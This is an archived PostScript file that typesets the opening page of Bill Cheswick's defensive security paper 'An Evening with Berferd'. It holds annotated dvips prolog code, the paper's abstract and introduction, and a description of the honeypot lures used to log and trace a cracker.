⟦dea84b86b⟧ TextFile

    Length: 84724 (0x14af4)
    Types: TextFile
    Names: »b.cheswick-An_evening_with_Berferd.ps«

Derivation

└─⟦4f9d7c866⟧ Bits:30007245 EUUGD6: Sikkerheds distributionen
    └─⟦this⟧ »./papers/General_Unix/b.cheswick-An_evening_with_Berferd.ps« 

TextFile

%!

%!PS-Adobe-2.0
%%Creator: dvips 5.47 Copyright 1986-91 Radical Eye Software
%%Title: /tmp/lp60329.dvi
%%Pages: 11 1
%%BoundingBox: 0 0 612 792
%%DocumentFonts: Times-Bold Times-Roman Times-Italic Courier
%%EndComments
%%BeginProcSet: texc.pro
% texc.pro (dvips 5.47): core TeX-to-PostScript prolog, all defined inside the
% 200-entry TeXDict.  Abbreviations used throughout the file:
%   N = def, B = bind def, S = exch, X = exch def, TR = translate, p = show.
% Groups, in order of appearance:
%   @rigin           sets the DVI coordinate system (scale by 72/Resolution,
%                    flip y via the negative VResolution scale) and rounds the
%                    translation components of the CTM to whole device pixels.
%   @letter..@legal  paper-size selectors that only set vsize (and isls for
%                    landscape); @manualfeed/@copies poke statusdict.
%   df/dfs/df-tail/E build a Type 3 bitmap font: FontType 3, BuildChar is
%                    CharBuilder, Encoding is the IE array built by @start.
%                    df-tail also defines the font name as a {/foo setfont}
%                    procedure with the font object patched into slot 0.
%   ch-width..ch-dx  glyph metrics read from the trailing bytes of ch-data.
%   CharBuilder      setcachedevice then imagemask; each row is produced by G,
%                    which unpacks one byte at a time as (byte mod 18, byte
%                    idiv 18) and dispatches through the pl procedure table
%                    (adv/chg/nd/lsh/rsh/clr/set are the row-editing steps).
%   D/I              store a glyph (code + packed bitmap) into the font being
%                    defined, scaling the width byte when sf is not 1.
%   bop/eop          page boundaries: save/@rigin on bop, restore+showpage on
%                    eop, with optional userdict bop-hook/eop-hook/start-hook.
%   @start           pops VResolution, Resolution and the DVImag numerator
%                    (divided by 1000) and builds IE, a 256-entry array of
%                    one-character names used as the bitmap-font Encoding.
%   v/V              draw rules with imagemask of BDot; V picks one of two
%                    variants depending on whether statusdict /product
%                    starts with "Display".
%   a, b..t, w, x, y positioning/show shorthands used by the page bodies:
%                    a = moveto, M/b = show then rmoveto by delta, c..k set
%                    delta to -4..4, l..t show then shift by -4..4, y = show
%                    at an absolute position.
%   bos/eos          nested save/restore.
/TeXDict 200 dict def TeXDict begin /N /def load def /B{bind def}N /S /exch
load def /X{S N}B /TR /translate load N /isls false N /vsize 10 N /@rigin{
isls{[0 1 -1 0 0 0]concat}if 72 Resolution div 72 VResolution div neg scale
Resolution VResolution vsize neg mul TR matrix currentmatrix dup dup 4 get
round 4 exch put dup dup 5 get round 5 exch put setmatrix}N /@letter{/vsize 10
N}B /@landscape{/isls true N /vsize -1 N}B /@a4{/vsize 10.6929133858 N}B /@a3{
/vsize 15.5531 N}B /@ledger{/vsize 16 N}B /@legal{/vsize 13 N}B /@manualfeed{
statusdict /manualfeed true put}B /@copies{/#copies X}B /FMat[1 0 0 -1 0 0]N
/FBB[0 0 0 0]N /nn 0 N /IE 0 N /ctr 0 N /df-tail{/nn 8 dict N nn begin
/FontType 3 N /FontMatrix fntrx N /FontBBox FBB N string /base X array
/BitMaps X /BuildChar{CharBuilder}N /Encoding IE N end dup{/foo setfont}2
array copy cvx N load 0 nn put /ctr 0 N[}B /df{/sf 1 N /fntrx FMat N df-tail}
B /dfs{div /sf X /fntrx[sf 0 0 sf neg 0 0]N df-tail}B /E{pop nn dup definefont
setfont}B /ch-width{ch-data dup length 5 sub get}B /ch-height{ch-data dup
length 4 sub get}B /ch-xoff{128 ch-data dup length 3 sub get sub}B /ch-yoff{
ch-data dup length 2 sub get 127 sub}B /ch-dx{ch-data dup length 1 sub get}B
/ch-image{ch-data dup type /stringtype ne{ctr get /ctr ctr 1 add N}if}B /id 0
N /rw 0 N /rc 0 N /gp 0 N /cp 0 N /G 0 N /sf 0 N /CharBuilder{save 3 1 roll S
dup /base get 2 index get S /BitMaps get S get /ch-data X pop /ctr 0 N ch-dx 0
ch-xoff ch-yoff ch-height sub ch-xoff ch-width add ch-yoff setcachedevice
ch-width ch-height true[1 0 0 -1 -.1 ch-xoff sub ch-yoff .1 add]/id ch-image N
/rw ch-width 7 add 8 idiv string N /rc 0 N /gp 0 N /cp 0 N{rc 0 ne{rc 1 sub
/rc X rw}{G}ifelse}imagemask restore}B /G{{id gp get /gp gp 1 add N dup 18 mod
S 18 idiv pl S get exec}loop}B /adv{cp add /cp X}B /chg{rw cp id gp 4 index
getinterval putinterval dup gp add /gp X adv}B /nd{/cp 0 N rw exit}B /lsh{rw
cp 2 copy get dup 0 eq{pop 1}{dup 255 eq{pop 254}{dup dup add 255 and S 1 and
or}ifelse}ifelse put 1 adv}B /rsh{rw cp 2 copy get dup 0 eq{pop 128}{dup 255
eq{pop 127}{dup 2 idiv S 128 and or}ifelse}ifelse put 1 adv}B /clr{rw cp 2
index string putinterval adv}B /set{rw cp fillstr 0 4 index getinterval
putinterval adv}B /fillstr 18 string 0 1 17{2 copy 255 put pop}for N /pl[{adv
1 chg}bind{adv 1 chg nd}bind{1 add chg}bind{1 add chg nd}bind{adv lsh}bind{
adv lsh nd}bind{adv rsh}bind{adv rsh nd}bind{1 add adv}bind{/rc X nd}bind{1
add set}bind{1 add clr}bind{adv 2 chg}bind{adv 2 chg nd}bind{pop nd}bind]N /D{
/cc X dup type /stringtype ne{]}if nn /base get cc ctr put nn /BitMaps get S
ctr S sf 1 ne{dup dup length 1 sub dup 2 index S get sf div put}if put /ctr
ctr 1 add N}B /I{cc 1 add D}B /bop{userdict /bop-hook known{bop-hook}if /SI
save N @rigin 0 0 moveto}N /eop{clear SI restore showpage userdict /eop-hook
known{eop-hook}if}N /@start{userdict /start-hook known{start-hook}if
/VResolution X /Resolution X 1000 div /DVImag X /IE 256 array N 0 1 255{IE S 1
string dup 0 3 index put cvn put}for}N /p /show load N /RMat[1 0 0 -1 0 0]N
/BDot 260 string N /rulex 0 N /ruley 0 N /v{/ruley X /rulex X V}B /V
statusdict begin /product where{pop product dup length 7 ge{0 7 getinterval
(Display)eq}{pop false}ifelse}{false}ifelse end{{gsave TR -.1 -.1 TR 1 1 scale
rulex ruley false RMat{BDot}imagemask grestore}}{{gsave TR -.1 -.1 TR rulex
ruley scale 1 1 false RMat{BDot}imagemask grestore}}ifelse B /a{moveto}B
/delta 0 N /tail{dup /delta X 0 rmoveto}B /M{S p delta add tail}B /b{S p tail}
B /c{-4 M}B /d{-3 M}B /e{-2 M}B /f{-1 M}B /g{0 M}B /h{1 M}B /i{2 M}B /j{3 M}B
/k{4 M}B /w{0 rmoveto}B /l{p -4 w}B /m{p -3 w}B /n{p -2 w}B /o{p -1 w}B /q{p 1
w}B /r{p 2 w}B /s{p 3 w}B /t{p 4 w}B /x{0 S rmoveto}B /y{3 2 roll p a}B /bos{
/SS save N}B /eos{clear SS restore}B end
%%EndProcSet
%%BeginProcSet: texps.pro
% texps.pro (dvips 5.47): support for resident (printer) PostScript fonts.
%   rf   stack: widths-array fontname design-size scaled-size.  Computes
%        PixPerEm from scaled-size/655360 * design-size * Resolution / 7227,
%        copies the findfont dictionary minus /FID into nn, builds a /Metrics
%        dictionary from the 256-entry width array (each width * 1000 /
%        PixPerEm, keyed by the font's Encoding name), registers the copy
%        under fontname, then defines fontname as a {/foo setfont} procedure
%        with the PixPerEm-scaled makefont instance patched into slot 0.
%        This is how /Fa../Fi are produced in the setup section.
%   ObliqueSlant/SlantFont/ExtendFont/TransFont  derive slanted or
%        horizontally-extended variants via makefont; TransFont also strips
%        /FID and re-registers the result with definefont.
TeXDict begin /rf{655360 div mul Resolution mul 7227 div /PixPerEm X findfont
dup length 1 add dict /nn X{1 index /FID ne{nn 3 1 roll put}{pop pop}ifelse}
forall 256 dict begin nn /Encoding get 0 1 255{2 copy get 3 index 2 index get
1000 mul PixPerEm div def pop}for pop pop nn /Metrics currentdict put end
/fontname X /nn dup nn definefont[PixPerEm 0 0 PixPerEm neg 0 0]makefont N
fontname{/foo setfont}2 array copy cvx N fontname load 0 nn put}N
/ObliqueSlant{dup sin S cos div neg}B /SlantFont{/foo X[1 0 foo 1 0 0]
TransFont}N /ExtendFont{/foo X 3 2 roll[S{foo div}forall]3 1 roll[foo 0 0 1 0
0]TransFont}N /TransFont{S findfont S makefont dup length dict /nn X{1 index
/FID ne{nn 3 1 roll put}{pop pop}ifelse}forall dup nn definefont pop}N end
%%EndProcSet
%%BeginProcSet: special.pro
% special.pro (dvips 5.47): \special support, kept in its own SDict.
%   @SpecialDefaults  resets the per-special parameters (hs/vs size, ho/vo
%                     offset, hsc/vsc scale, ang, CLIP, BBcalc); the @hscale..
%                     @ury procedures are the option setters that follow.
%   @MacSetUp         only acts when userdict holds a /md dictionary (a
%                     Macintosh-style prolog); redefines its od/txpose/cp
%                     entries so the included figure composes with dvips's
%                     own coordinate system.
%   normalscale       device-pixel to point scaling, times DVImag if magscale.
%   startTexFig/doclip/endTexFig  psfig-style figure inclusion: bounding box
%                     values arrive in scaled points (psfts divides by 65536),
%                     the figure is scaled to fit, and an optional clip path
%                     is set from the llx/lly/urx/ury box.
%   @beginspecial/@setspecial/@endspecial  bracket an inline EPS: save+gsave,
%                     optional clip/offset/scale/rotate/bounding-box fit,
%                     then grestore+restore.  Both startTexFig and @setspecial
%                     redefine showpage, erasepage and copypage as no-ops so a
%                     misbehaving included file cannot eject or erase the
%                     surrounding TeX page.
%   li/rl/rc/np/st/fil/ellipse  tpic-style drawing primitives; np/st/fil
%                     remember and restore the current point around the path.
TeXDict begin /SDict 200 dict N SDict begin /@SpecialDefaults{/hs 612 N /vs
792 N /ho 0 N /vo 0 N /hsc 1 N /vsc 1 N /ang 0 N /CLIP false N /BBcalc false N
/p 3 def}B /@scaleunit 100 N /@hscale{@scaleunit div /hsc X}B /@vscale{
@scaleunit div /vsc X}B /@hsize{/hs X /CLIP true N}B /@vsize{/vs X /CLIP true
N}B /@hoffset{/ho X}B /@voffset{/vo X}B /@angle{/ang X}B /@rwi{10 div /rwi X}
B /@llx{/llx X}B /@lly{/lly X}B /@urx{/urx X}B /@ury{/ury X /BBcalc true N}B
/magscale true def end /@MacSetUp{userdict /md known{userdict /md get type
/dicttype eq{md begin /letter{}N /note{}N /legal{}N /od{txpose 1 0 mtx
defaultmatrix dtransform S atan/pa X newpath clippath mark{transform{
itransform moveto}}{transform{itransform lineto}}{6 -2 roll transform 6 -2
roll transform 6 -2 roll transform{itransform 6 2 roll itransform 6 2 roll
itransform 6 2 roll curveto}}{{closepath}}pathforall newpath counttomark array
astore /gc xdf pop ct 39 0 put 10 fz 0 fs 2 F/|______Courier fnt invertflag{
PaintBlack}if}N /txpose{pxs pys scale ppr aload pop por{noflips{pop S neg S TR
pop 1 -1 scale}if xflip yflip and{pop S neg S TR 180 rotate 1 -1 scale ppr 3
get ppr 1 get neg sub neg ppr 2 get ppr 0 get neg sub neg TR}if xflip yflip
not and{pop S neg S TR pop 180 rotate ppr 3 get ppr 1 get neg sub neg 0 TR}if
yflip xflip not and{ppr 1 get neg ppr 0 get neg TR}if}{noflips{TR pop pop 270
rotate 1 -1 scale}if xflip yflip and{TR pop pop 90 rotate 1 -1 scale ppr 3 get
ppr 1 get neg sub neg ppr 2 get ppr 0 get neg sub neg TR}if xflip yflip not
and{TR pop pop 90 rotate ppr 3 get ppr 1 get neg sub neg 0 TR}if yflip xflip
not and{TR pop pop 270 rotate ppr 2 get ppr 0 get neg sub neg 0 S TR}if}
ifelse scaleby96{ppr aload pop 4 -1 roll add 2 div 3 1 roll add 2 div 2 copy
TR .96 dup scale neg S neg S TR}if}N /cp{pop pop showpage pm restore}N end}if}
if}N /normalscale{Resolution 72 div VResolution 72 div neg scale magscale{
DVImag dup scale}if}N /psfts{S 65536 div N}N /startTexFig{/psf$SavedState save
N userdict maxlength dict begin /magscale false def normalscale currentpoint
TR /psf$ury psfts /psf$urx psfts /psf$lly psfts /psf$llx psfts /psf$y psfts
/psf$x psfts currentpoint /psf$cy X /psf$cx X /psf$sx psf$x psf$urx psf$llx
sub div N /psf$sy psf$y psf$ury psf$lly sub div N psf$sx psf$sy scale psf$cx
psf$sx div psf$llx sub psf$cy psf$sy div psf$ury sub TR /showpage{}N
/erasepage{}N /copypage{}N /p 3 def @MacSetUp}N /doclip{psf$llx psf$lly
psf$urx psf$ury currentpoint 6 2 roll newpath 4 copy 4 2 roll moveto 6 -1 roll
S lineto S lineto S lineto closepath clip newpath moveto}N /endTexFig{end
psf$SavedState restore}N /@beginspecial{SDict begin /SpecialSave save N gsave
normalscale currentpoint TR @SpecialDefaults}N /@setspecial{CLIP{newpath 0 0
moveto hs 0 rlineto 0 vs rlineto hs neg 0 rlineto closepath clip}if ho vo TR
hsc vsc scale ang rotate BBcalc{rwi urx llx sub div dup scale llx neg lly neg
TR}if /showpage{}N /erasepage{}N /copypage{}N newpath}N /@endspecial{grestore
clear SpecialSave restore end}N /@defspecial{SDict begin}N /@fedspecial{end}B
/li{lineto}B /rl{rlineto}B /rc{rcurveto}B /np{/SaveX currentpoint /SaveY X N 1
setlinecap newpath}N /st{stroke SaveX SaveY moveto}N /fil{fill SaveX SaveY
moveto}N /ellipse{/endangle X /startangle X /yrad X /xrad X /savematrix matrix
currentmatrix N TR xrad yrad scale 0 0 1 startangle endangle arc savematrix
setmatrix}N end
%%EndProcSet
% Document font setup.  "1000 300 300 @start" sets VResolution=300,
% Resolution=300 and DVImag=1000/1000 (see @start in texc.pro).
% Each /Fx definition is: a 256-entry per-character width array, the
% resident font name, the design size and the scaled size, consumed by rf
% (texps.pro); the ratio scaled/655360 (524288 -> 0.8, 655360 -> 1.0,
% 786432 -> 1.2, 917504 -> 1.4) selects the point size relative to the
% design size.  Fonts defined here:
%   Fa Times-Roman (0.8)   Fb Courier (0.9)   Fc Courier (1.0)
%   Fe Times-Italic (1.0)  Ff Times-Roman (1.0)  Fg Times-Bold (1.0)
%   Fh Times-Bold (1.2)    Fi Times-Bold (1.4)
% Fd is the one exception: a Type 3 bitmap font built with df/D/E from
% texc.pro (1 glyph, 16-byte base string) whose only character, code 15
% (octal \017), is the packed bullet bitmap used for list items
% ("Fd(\017)" in the page bodies).  The hex string is decoded at
% BuildChar time by CharBuilder/G.
TeXDict begin 1000 300 300 @start /Fa [ 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 8 11 14 17 17 28
26 11 11 11 17 19 8 11 8 9 17 17 17 17 17 17 17 17 17 17 9
9 19 19 19 15 31 24 22 22 24 20 18 24 24 11 13 24 20 30 24
24 18 24 22 18 20 24 24 31 24 24 20 11 9 11 16 17 11 15 17
15 17 15 11 17 17 9 9 17 9 26 17 17 17 17 11 13 9 17 17 24
17 17 15 16 7 16 18 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 11 17 17 6 17 17 17 17 6 15 17
11 11 18 18 0 17 17 17 8 0 15 12 11 15 15 17 33 33 0 15 0 11
11 11 11 11 11 11 11 0 11 11 0 11 11 11 33 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 30 0 9 0 0 0 0 20 24 30 10 0 0 0 0 0 22 0 0
0 9 0 0 9 17 24 17 0 0 0 0 ] /Times-Roman 1000 524288 rf /Fb
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
22 22 22 22 22 22 22 22 22 22 22 22 22 0 0 0 22 22 22 22 0
22 22 22 22 22 22 22 0 0 22 0 22 22 22 22 22 22 22 22 0 22
22 0 22 22 22 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 22 0 0
0 0 22 22 0 22 0 0 0 0 0 0 0 0 0 22 0 0 22 22 0 22 0 0 0 0
] /Courier 1000 589824 rf /Fc [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25
25 25 25 25 25 25 25 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 25 25 25 25 25 25 25 25 25 25
25 25 25 0 0 0 25 25 25 25 0 25 25 25 25 25 25 25 0 0 25 0
25 25 25 25 25 25 25 25 0 25 25 0 25 25 25 25 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 25 0 0 0 0 25 25 0 25 0 0 0 0 0 0 0 0
0 25 0 0 25 25 0 25 0 0 0 0 ] /Courier 1000 655360 rf /Fd 1
16 df<EA03C0EA0FF0EA1FF8EA3FFCEA7FFEA2B5FCA4EA7FFEA2EA3FFCEA1FF8EA0FF0EA03C010
107E9115>15 D E /Fe [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 10 14 17 21 21 35 32 14 14 14 21
28 10 14 10 12 21 21 21 21 21 21 21 21 21 21 14 14 28 28 28
21 38 25 25 28 30 25 25 30 30 14 18 28 23 35 28 30 25 30 25
21 23 30 25 35 25 23 23 16 12 16 18 21 14 21 21 18 21 18 12
21 21 12 12 18 12 30 21 21 21 21 16 16 12 21 18 28 18 18 16
17 11 17 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 16 21 21 7 21 21 21 21 9 23 21 14 14 21
21 0 21 21 21 10 0 22 15 14 23 23 21 37 42 0 21 0 14 14 14
14 14 14 14 14 0 14 14 0 14 14 14 37 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 37 0 11 0 0 0 0 23 30 39 13 0 0 0 0 0 28 0 0 0 12
0 0 12 21 28 21 0 0 0 0 ] /Times-Italic 1000 655360 rf /Ff
[ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 10 14 17 21 21 35 32 14 14 14 21 23 10 14 10 12 21 21
21 21 21 21 21 21 21 21 12 12 23 23 23 18 38 30 28 28 30 25
23 30 30 14 16 30 25 37 30 30 23 30 28 23 25 30 30 39 30 30
25 14 12 14 19 21 14 18 21 18 21 18 14 21 21 12 12 21 12 32
21 21 21 21 14 16 12 21 21 30 21 21 18 20 8 20 22 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 14
21 21 7 21 21 21 21 7 18 21 14 14 23 23 0 21 21 21 10 0 19
15 14 18 18 21 42 42 0 18 0 14 14 14 14 14 14 14 14 0 14 14
0 14 14 14 42 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 37 0 11 0 0 0
0 25 30 37 13 0 0 0 0 0 28 0 0 0 12 0 0 12 21 30 21 0 0 0 0
] /Times-Roman 1000 655360 rf /Fg [ 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 10 14 23 21 21 42 35
14 14 14 21 24 10 14 10 12 21 21 21 21 21 21 21 21 21 21 14
14 24 24 24 21 39 30 28 30 30 28 25 32 32 16 21 32 28 39 30
32 25 32 30 23 28 30 30 42 30 30 28 14 12 14 24 21 14 21 23
18 23 18 14 21 23 12 14 23 12 35 23 21 23 23 18 16 14 23 21
30 21 21 18 16 9 16 22 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 14 21 21 7 21 21 21 21 12 21
21 14 14 23 23 0 21 21 21 10 0 22 15 14 21 21 21 42 42 0 21
0 14 14 14 14 14 14 14 14 0 14 14 0 14 14 14 42 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 42 0 12 0 0 0 0 28 32 42 14 0 0 0 0 0 30
0 0 0 12 0 0 12 21 30 23 0 0 0 0 ] /Times-Bold 1000 655360
rf /Fh [ 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 12 17 28 25 25 50 41 17 17 17 25 28 12 17 12
14 25 25 25 25 25 25 25 25 25 25 17 17 28 28 28 25 46 36 33
36 36 33 30 39 39 19 25 39 33 47 36 39 30 39 36 28 33 36 36
50 36 36 33 17 14 17 29 25 17 25 28 22 28 22 17 25 28 14 17
28 14 41 28 25 28 28 22 19 17 28 25 36 25 25 22 20 11 20 26
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 17 25 25 8 25 25 25 25 14 25 25 17 17 28 28 0 25 25
25 12 0 27 17 17 25 25 25 50 50 0 25 0 17 17 17 17 17 17 17
17 0 17 17 0 17 17 17 50 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 50
0 15 0 0 0 0 33 39 50 16 0 0 0 0 0 36 0 0 0 14 0 0 14 25 36
28 0 0 0 0 ] /Times-Bold 1000 786432 rf /Fi [ 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 15 19 32
29 29 58 48 19 19 19 29 33 15 19 15 16 29 29 29 29 29 29 29
29 29 29 19 19 33 33 33 29 54 42 39 42 42 39 36 45 45 23 29
45 39 55 42 45 36 45 42 32 39 42 42 58 42 42 39 19 16 19 34
29 19 29 32 26 32 26 19 29 32 16 19 32 16 48 32 29 32 32 26
23 19 32 29 42 29 29 26 23 13 23 30 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 19 29 29 10 29
29 29 29 16 29 29 19 19 32 32 0 29 29 29 15 0 31 20 19 29 29
29 58 58 0 29 0 19 19 19 19 19 19 19 19 0 19 19 0 19 19 19
58 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 58 0 17 0 0 0 0 39 45 58
19 0 0 0 0 0 42 0 0 0 16 0 0 16 29 42 32 0 0 0 0 ] /Times-Bold
1000 917504 rf end
%%EndProlog
%%BeginSetup
%%Feature: *Resolution 300
% Re-enter TeXDict for the page bodies; every bop/eop page below runs with
% TeXDict on the dictionary stack so the short operators (a, b, y, Fx...)
% resolve.  Closed by the matching "end" after the last page.
TeXDict begin 
%%EndSetup
%%Page: 1 1
% Page 1 body (between bop and eop; all operators come from texc.pro/texps.pro
% in this file).  Fonts: Fi = title, Fh = author, Fg = section headings,
% Ff = body text, Fe = italic, Fc = typewriter, Fd(\017) = bullet.
% Content on this page: title and author, the Abstract, Section 1
% "Introduction", and the first three items of the list of monitored lures
% (FTP, Telnet/login, Guest/visitor accounts).  Octal escapes in the strings
% are font-encoding positions, e.g. \256 = fi ligature, \252/\272 = quotes,
% \320 = em dash; they are literal show() data and must not be edited.
bop 663 169 a Fi(An)14 b(Evening)h(with)h(Berferd)327 243 y(In)e(Which)i(a)e
(Cracker)g(is)h(Lur)o(ed,)f(Endur)o(ed,)g(and)h(Studied)829
367 y Fh(Bill)d(Cheswick)713 467 y(A)l(T&T)h(Bell)g(Laboratories)898
659 y Fg(Abstract)0 751 y Ff(On)d(7)h(January)f(1991)g(a)h(cracker)n(,)i
(believing)c(he)i(had)f(discovered)h(the)f(famous)h(sendmail)f(DEBUG)h(hole)f
(in)g(our)g(Internet)g(gateway)0 801 y(machine,)h(attempted)f(to)g(obtain)f
(a)i(copy)f(of)g(our)g(password)g(\256le.)15 b(I)c(sent)f(him)g(one.)0
869 y(For)h(several)i(months)d(we)i(led)g(this)f(cracker)h(on)f(a)i(merry)e
(chase)i(in)e(order)g(to)g(trace)i(his)e(location)f(and)i(learn)f(his)g
(techniques.)19 b(This)0 919 y(paper)12 b(is)f(a)h(chronicle)f(of)h(the)f
(cracker)r(')n(s)h(\252successes\272)j(and)c(disappointments,)g(the)g(bait)g
(and)g(traps)h(used)g(to)e(lure)i(and)f(detect)h(him,)0 969
y(and)e(the)g(chroot)g(\252Jail\272)h(we)g(built)d(to)i(watch)g(his)g
(activities.)0 1036 y(W)m(e)15 b(concluded)g(that)f(our)g(cracker)i(had)f(a)g
(lot)f(of)h(time)f(and)h(persistence,)i(and)e(a)g(good)f(list)g(of)g
(security)h(holes)f(to)g(use)i(once)f(he)0 1086 y(obtained)10
b(a)h(login)f(on)g(a)i(machine.)18 b(W)n(ith)10 b(these)i(holes)e(he)h(could)
g(often)f(subvert)g(the)h Fe(uucp)g Ff(and)g Fe(bin)f Ff(accounts)h(in)f
(short)h(order)n(,)g(and)0 1136 y(then)f Fe(r)n(oot)p Ff(.)15
b(Our)10 b(cracker)i(was)f(interested)e(in)h(military)f(tar)o(gets)h(and)h
(new)f(machines)h(to)f(help)g(launder)g(his)f(connections.)0
1318 y Fg(1.)21 b(Intr)o(oduction)83 1414 y Ff(Our)8 b(secure)h(Internet)e
(gateway)h(was)h(\256rmly)e(in)h(place)g(by)g(the)f(spring)g(of)h(1990[1)n
(].)15 b(W)n(ith)7 b(the)h(castle)h(gate)f(in)f(place,)i(I)f(wondered)0
1463 y(how)k(often)f(the)h(lock)g(was)g(tried.)20 b(I)12 b(knew)g(there)g
(were)h(barbarians)f(out)f(there.)21 b(Who)12 b(were)g(they?)20
b(Where)13 b(did)e(they)h(attack)g(from)0 1513 y(and)e(how)g(often?)15
b(What)10 b(security)g(holes)g(did)f(they)h(try?)k(They)d(weren')o(t)f(doing)
f(any)h(damage)i(to)d(A)-5 b(T&T)m(,)12 b(merely)f(\256ddling)d(with)h(the)0
1563 y(door)n(.)15 b(The)c(ultimate)f(fun)g(would)g(be)h(to)f(lure)g(a)h
(cracker)h(into)d(a)i(situation)e(where)i(we)g(log)f(his)g(sessions,)h(learn)
g(a)g(thing)e(or)i(two,)f(and)0 1613 y(warn)g(his)g(subsequent)g(tar)o(gets.)
0 1681 y(The)f(owner)g(of)f(an)h(average)h(workstation)d(on)h(the)h(Internet)
f(has)h(few)g(tools)e(for)h(answering)h(these)g(questions.)14
b(Commercial)9 b(systems)0 1730 y(detect)k(and)g(report)f(some)i(probes,)f
(but)f(ignore)g(many)h(others.)23 b(Our)12 b(gateway)h(was)h(producing)d(10)h
(megabytes)i(of)e(detailed)h(logs)0 1780 y(each)e(day)g(for)f(the)g(standard)
g(services.)16 b(How)10 b(often)f(were)j(people)e(trying)e(to)i(use)g(the)h
(services)g(we)f(did)g(not)f(support?)0 1848 y(W)m(e)14 b(added)g(a)g(few)g
(fake)h(services,)g(and)f(I)g(wrote)f(a)i(script)e(to)g(scan)h(the)g(logs)f
(daily)m(.)25 b(This)14 b(list)e(of)i(services)g(and)g(other)f(lures)h(has)0
1898 y(grown\320we)9 b(now)h(check)h(the)f(following:)42 1999
y Fd(\017)20 b Fe(FTP:)13 b Ff(The)g(scanner)f(produces)g(a)h(report)e(of)h
(all)g(login)e(names)j(that)f(were)h(attempted.)20 b(It)12
b(also)g(reports)f(the)h(use)g(of)g(a)h(tilde)e(\(a)83 2048
y(possible)h(probe)h(of)g(an)g(old)f(FTP)i(bug\),)f(all)g(attempts)g(to)f
(obtain)g(FTP')n(s)h Fc(/etc/passwd)f Ff(and)h Fc(/etc/group)g
Ff(\256les,)h(and)83 2098 y(a)f(list)e(of)h(all)f(\256les)i(stored)f(in)f
(the)h Fc(pub)g Ff(directory)m(.)20 b(People)13 b(who)e(obtain)g(the)h
Fc(passwd)g Ff(\256le)h(are)g(often)e(looking)f(for)i(account)83
2148 y(names)g(to)e(try)m(,)h(and)g(password)g(entries)g(to)f(crack.)18
b(Sometimes)12 b(system)f(administrators)f(put)g(their)g(real)h(password)g
(\256le)g(in)f(the)83 2198 y(FTP)h(directory)m(.)j(W)m(e)d(have)g(a)g(bogus)e
(\256le)i(whose)f(passwords,)h(when)f(cracked,)i(are)f Fe(why)31
b(ar)n(e)h(you)f(wasting)e(your)j(time.)42 2281 y Fd(\017)20
b Fe(T)l(elnet/login:)c Ff(All)10 b(login)h(attempts)g(are)h(logged)f(and)h
(reviewed)g(daily)m(.)19 b(It)11 b(is)h(easy)g(to)f(spot)g(when)h(someone)g
(is)g(trying)e(many)83 2331 y(accounts,)h(or)f(hammering)h(on)e(a)i
(particular)f(account.)15 b(Since)c(there)f(are)h(no)f(authorized)g(accounts)
h(for)f(Internet)f(users)i(on)f(our)83 2381 y(gateway)h(other)e(than)h
Fc(guard)p Ff(,)h(it)e(is)h(easy)h(to)f(pick)g(out)f(probes.)42
2464 y Fd(\017)20 b Fe(Guest/visitor)9 b(accounts:)16 b Ff(A)11
b(public)e(computer)i(account)g(is)g(the)f(\256rst)h(thing)e(a)i(cracker)h
(looks)e(for)n(.)16 b(These)c(accounts)f(provide)83 2513 y(friendly)m(,)g
(easy)h(access)i(to)c(nearly)h(every)h(\256le)g(in)e(the)h(machine,)i
